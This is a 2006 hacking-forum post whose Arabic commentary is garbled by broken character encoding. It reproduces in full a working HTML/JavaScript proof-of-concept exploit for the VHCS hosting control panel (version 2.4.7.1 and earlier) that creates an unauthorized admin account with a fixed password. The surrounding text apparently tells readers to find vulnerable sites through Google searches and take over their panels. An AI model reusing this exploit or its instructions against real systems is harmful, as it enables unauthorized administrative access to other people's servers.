ËÛÑå Óåáå Vhcs - hacking collection

Members Login

Post Info

TOPIC: ËÛÑå Óåáå Vhcs

so9or

ÓÑíå ÓÝíÇä Èä ÚæÝ ÇáÛÇãÏí ááÌåÇÏ ÇáßÊÑæäí

Status: Offline

Posts: 632

Date: Mon May 1 22:27:12 2006

ËÛÑå Óåáå Vhcs	Permalink

ÈÓã Çááå ÇáÑÍãä ÇáÑÍíã ÇÓã ÇáËÛÑå : ÊÛÑÉ Vhcs ÇÈÍË Ýí Çì ãÍÑß ÈÍË www.google.com Úä ßáãå ßæÏ:vhcs ßæÏ:<html> <head> <title>VHCS (version <= 2.4.7.1) PoC. By RoMaNSoFt</title> <script language="JavaScript"> function submitform() { if (document.admin_add_user.username.value=='admin') { alert('Learn to read before launching an exploit, script-kiddie!'); exit(); } document.admin_add_user.action=document.admin_add_ user.target.value; document.admin_add_user.submit(); } </script> </head> <body> <hr> <center> <b>VHCS (version <= 2.4.7.1) PoC. By RoMaNSoFt &#60roman&#64rs-labs.com&#62 [08.Feb.2006]</b> </center> <hr> <form name="admin_add_user" method="post" action=""> <table width="100%" cellpadding="5" cellspacing="5"> <tr> <td width="20"> </td> <td colspan="2"> </td> </tr> <tr> <td width="20"> </td> <td width="200">Target URL</td> <td> <input type="text" name="target" value="http://<target>/vhcs2/admin/add_user.php" style="width:400px"> </td> </tr> <tr> <td width="20"> </td> <td width="200">Username</td> <td> <input type="text" name="username" value="admin" style="width:200px"> (should NOT exist) </td> </tr> <tr> <td> </td> <td colspan="2"><a href="javascript: submitform()">Exploit it!</a></td> </tr> <tr> <td colspan="3"> </td> </tr> </table> <input type="hidden" name="pass" value="dsrrocks"> <input type="hidden" name="pass_rep" value="dsrrocks"> <input type="hidden" name="email" value="vhcs-exploit@rs-labs.com"> <input type="hidden" name="uaction" value="add_user"> </form> <hr> <br> <u>Quick instructions</u>.-<br> <br> 1.- Enable JavaScript. Fill in the form with appropiate target URL (usually you will only need to replace &#60target&#62 string) and username.<br> 2.- Remember not to use a probably existing username (such as "admin").<br> 3.- Launch the exploit. <i>If target system is vulnerable, a new VHCS admin user will be created</i> <br> 4.- You will be redirected to VHCS login page. Try to login with your brand new username.<br> 5.- Ummm, I forgot it... The password is: <b>dsrrocks</b>.<br> <br> <u>More info (analysis, fix, etc)</u>.-<br> <br> See <a href=http://www.rs-labs.com/adv/RS-Labs-Advisory-2006-1.txt><i>RS-2006-1</i></a>.<br> <br> <hr> </body> </html> ØÈÚÇ äáÇÍÙ ÇáßæÏ ÈáÛå html Çæß ääÇÎÏ ÇáßæÏ æääÓÎå æÇÍÝÙå ÈÇãÊÏÇÏ html æÛíÑ ßáãå <target>/ áÇÓã ÇáãæÞÚ Çáì ÇáãÕÇÈ æÝì ÎÇäå Username ÎíÑ ÈÇì ÇÓã ÊÈíå ãËáÇ alsakr ÈÚÏ ÐÇáß ÇÖÛØ Úáì ßáãå Exploit it! ÊáÇÍÙ Çäß Ýì áæÍå ÇáÊÍßã æíØáÈ ãäß ÇáíæÒÑ æÇáÈÇÕ ØÈÚÇ ÇáíæÒ Çáì ÇÚØíäÇ ÇíÇå ãËáÇ asbmay æÇáÈÇÕ ØÈÚÇ åæå dsrrocks ÊáÇÍÙå ãßÊæÈ ÈáËÛÑå æÇáÝ ãÈÑæß ÇÕÈÍÊ Ýì áæÍå ÇáÊÍßã __________________

Page 1 of 1 sorted by

Add/remove tags to this thread

Tweet this page

Post to Digg

Post to Del.icio.us

Create your own FREE Forum
Report Abuse